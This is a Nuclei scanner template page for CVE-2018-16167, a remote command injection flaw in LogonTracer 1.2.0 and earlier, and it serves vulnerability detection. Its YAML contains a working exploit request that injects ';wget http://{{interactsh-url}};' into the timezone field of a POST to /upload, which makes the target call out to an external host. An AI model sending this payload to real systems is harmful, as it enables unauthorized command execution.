Skip to content
Nuclei Templates

LogonTracer <=1.2.0 - Remote Command Injection

ID: CVE-2018-16167

Severity: critical

Author: gy741

Tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert

Description

Section titled “Description”

LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.

YAML Source

Section titled “YAML Source”
id: CVE-2018-16167


info:
  name: LogonTracer <=1.2.0 - Remote Command Injection
  author: gy741
  severity: critical
  description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade LogonTracer to a version higher than 1.2.0.
  reference:
    - https://www.exploit-db.com/exploits/49918
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16167
    - https://jvn.jp/en/vu/JVNVU98026636/index.html
    - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16167
    cwe-id: CWE-78
    epss-score: 0.27457
    epss-percentile: 0.96794
    cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jpcert
    product: logontracer
  tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert


http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - http
# digest: 490a0046304402203a81af2e1203549bba4280bf2833e0f170be87f0011353ca99d3e2d541a573bd02207c5fdc031884b8085eaa5a8251535c5e3489d1f678268224b6133fb04827f4b6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16167.yaml"

View on Github